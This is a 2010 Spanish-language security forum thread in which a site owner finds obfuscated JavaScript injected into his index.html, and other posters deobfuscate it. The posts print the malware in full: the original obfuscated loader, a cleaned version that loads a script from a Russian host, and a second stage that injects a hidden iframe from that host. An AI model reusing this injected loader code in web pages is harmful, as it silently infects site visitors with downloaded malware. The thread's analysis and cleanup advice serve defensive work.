Imprimir Página - Me hackearon y dejaron un regalo. ayuda!

Título: Me hackearon y dejaron un regalo. ayuda!
Publicado por: darkgx en 14 Mayo 2010, 23:06 pm

Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano. :-\ Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto :-\

Código:

<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->

Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo :o

:'( ayudaaaaaaaaaaaaaaaaaa
:-(
EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta :o es un archivo .js se llama sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa???????????? :(

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox :o

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: .:WindHack:. en 14 Mayo 2010, 23:41 pm

Borra las Cookies, el historial de navegación y los archivos temporales de internet.

Saludos,

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: invisible_hack en 15 Mayo 2010, 00:24 am

Para mi que es algun tipo de capturador de cookies de sesión, para volver a robarte la sesión en cuanto te volvieses a loguear...lo digo por...

Código:

d214af83de230538e9ec96da2945cae1

Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Bueno, un saludo...

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: cgvwzq en 15 Mayo 2010, 01:46 am

Código

function G(){
	_l=document.createElement("script");
	_l["defer"]="1";
	_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
	document.body["appendChild"](_l);
};

Ese es el script desofuscado...

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: Novlucker en 15 Mayo 2010, 03:38 am

El sitio esta marcado como dañino y el navegador me bloquea, y al ingresar no consigo que me muestre nada, ya he probado con muchos user-agent y diferentes navegadores, pero nada de nada >:(

Saludos

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: darkgx en 15 Mayo 2010, 03:57 am

Citar

Borra las Cookies, el historial de navegación y los archivos temporales de internet.

Listop :P

Citar

Lo primero que hice fue borrar ese codigo, pero igual si dicen que tiene un XSS va a poder entrar nuevamente por el mismo :( asi que...

si alguien quiere la web para ver el agujero que tiene si me quiere ayudar que me diga asi le paso la web por privado, la no tiene PHP ni SQL. solo tiene 1 Frame <FONT> y 1 script que lo uso para sacar la propaganda de la web :-\ por lo cual es una pagina muy simple sin scrpts salvo el mensionado anteriormente, no es grande la pagina y no debe ser muy complicado ver el error.

Bueno les mando saludos gracias por la ayuda y ya hice todo lo que me dijieron :)

Saludos, espero que alguien pueda ayudarme :(

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: Novlucker en 15 Mayo 2010, 04:02 am

Es un servidor gratuito? un wordpress?
Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas :P

Saludos

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: darkgx en 15 Mayo 2010, 04:10 am

Citar

Es un servidor gratuito? un wordpress?

Si, es un servidor gratuito

Citar

Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas

Ok ;D, ahora ya me dejo de aparecer el mensaje del antivirus, no lo detecta mas.
AH! tambien cambie la contraseña de mi host

Saludos :)

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: darkgx en 15 Mayo 2010, 15:13 pm

Ahhh! el NOD32 me detecta muchas veces que mi pc ah querido conectarse a otro lado!! y esto me resulto familiar

Código

function G(){	_l=document.createElement("script");	_l["defer"]="1";	_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";	document.body["appendChild"](_l);}

ahora que lo veo bien me doy cuenta de esto:

Código:

_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";

Ahora estas son algunas screenshot que saque de cuando mi pc o otra maquina remota se quiso conectar a mi. >:( Mientras digo que creo que esto fue por que un contacto mio del msn, me paso un link y yo lo clickie.. pero era una persona en quien confiaba, no suelo entrar a cualquier link raro pero bueno, no parecia tan raro este :xD creo que de ahi viene todo esto y es la misma persona.

(http://r.i.elhacker.net/cache?url=http://img208.imageshack.us/img208/9440/viruss.jpg)
(http://r.i.elhacker.net/cache?url=http://img294.imageshack.us/img294/8615/nod1r.jpg)
(http://r.i.elhacker.net/cache?url=http://img202.imageshack.us/img202/3013/nod2m.jpg)

Bueno creo que ya se abran dado cuenta de que la direccion es la misma que la que mostro cgvwzq, tambien capture la ip y a que puerto se conecto.
(http://r.i.elhacker.net/cache?url=http://img245.imageshack.us/img245/4715/ipgotit.jpg)
Bueno despues de ver que se conecto a un puerto ( el 1125) lo blockee/cerre, pero despues se vuelve a conectar a otro puerto :xD me re cago...

ahi esta la ip resuelta: ns208753.ovh.net , al parecer es una ip dinamica asique si bloqueo la ip igual va a segir :-\ aunque hace 2 dias que no me alerta el antivirus.

El nombre del archivo era Abril06.jpg.exe no se como no me di cuenta :xD . es el mismo tipo el que hackeo la web. debo tener algun keylogger :huh:

Bueno ya no se que hacer le pase el NOD23, el RegSeeker y el Malwarebytes actualizado y no paso nada :(

PD: Ya se que no se puede hacer doble post, pero quise aprovechar lo que dijo cgvwzq.

Saludos :¬¬

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: winroot en 15 Mayo 2010, 19:08 pm

actualiza tu av, inicia en modo seguro sin red y escanea tu pc completamente.

si el problema sigue, tendrás que enviarnos un log de hijackthis o algo por el estilo.
por cierto
como hizo para desofuscar el script?

el código de la web ahora se los paso.
saludos
edit:
ni usando el get desde cmd.exe se puede abrir la página.
intenté con ie7, y me dice que no puede descargar el archivo.

parece ser, que es un script preparado para un trojan.downloader espesífico
saludos

Título: Re: Me hackearon y dejaron un regalo. ayuda!
Publicado por: cgvwzq en 15 Mayo 2010, 20:49 pm

He mirado un poco más la parte de la web. La página en cuestión solo se muestra si existe la cabecera Referer:, y contiene el siguiente script:

Código

try{
 
F53981243 = document.referrer;
Nsrd2unvt = '';
Tfym92yesygh = 'ES';
function Cr8z7f2tf8(V8vurp6x9cfrz){
  if (F53981243.indexOf(V8vurp6x9cfrz) != -1){
    Nsrd2unvt=V8vurp6x9cfrz;
   }
}
Cr8z7f2tf8('g*o7o]gXl*e7.Xr6u*'.replace(/[\*67X\]]/g, ''));
Cr8z7f2tf8('m2aDi#l2.2rDu2'.replace(/[2D#\|X]/g, ''));
Cr8z7f2tf8('y{ain)d{e)xT.CriuT'.replace(/[T\{C\)i]/g, ''));
Cr8z7f2tf8('rpaBmpb~lBepro.prou('.replace(/[\(~pBo]/g, ''));
 
if (Nsrd2unvt && Tfym92yesygh == 'RU'){
    window.location= 'hPtPtxpx:~/P/AleiegAhAtA.Ak~aetPaelPo~g~-edPoeseuxgxaA.Ar~ue/A?~sPtPixde=P8A8x&ArAiPdx=~2e5x5~6x'.replace(/[x~ePA]/g, '');
}else{
    Athvzpwjthi8chwh = 'http://gothguilt.ru:8080/index.php?pid=1&home=1';
    F7ipjzz32gtxvlp7amy = 24-(12*2);
    var D6ouc495shy0 = document.createElement('div');
    D6ouc495shy0.id = 'G6i85jq19fd';
    document.body.appendChild(D6ouc495shy0);
    Pygxn4t7yxe6p = 'F7ipjzz32gtxvlp7amy';
    F15fy37lsuro9 = document.createElement('i$^f@&r((^a&@$!m)$e)$(&'.replace(/\)|\$|@|\^|#|&|\!|\(/ig, ''));
    F15fy37lsuro9.src = Athvzpwjthi8chwh;
    F15fy37lsuro9.height = F7ipjzz32gtxvlp7amy;
    F15fy37lsuro9.width = F7ipjzz32gtxvlp7amy;
    document.getElementById('G6i85jq19fd').appendChild(F15fy37lsuro9);
}
}catch(e){}

Si lo limpiamos un poco, vemos que comprueba el Referrer, y en caso de que contenga 'RU' nos redireccionará a una página de rusas...xD
Sino crea un div y mete un iframe de 'http://gothguilt.ru:8080/index.php?pid=1&home=1'. Es el mismo malware que se usa en todas las páginas que he visto: la misma ofuscación, mismas comprobaciones, y al final solo dejan un iframe metido para ejecutar los comandos que quieran en la víctima que visite la página infectada...

Lo curioso es que me ha mostrado el script la primera vez, y ahora lo estoy tratando de recuperar y no puedo.

En cualquier caso la moraleja es clara: navega con proxy ruso, menos malware y más teta.

Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: darkgx en 14 Mayo 2010, 23:06 pm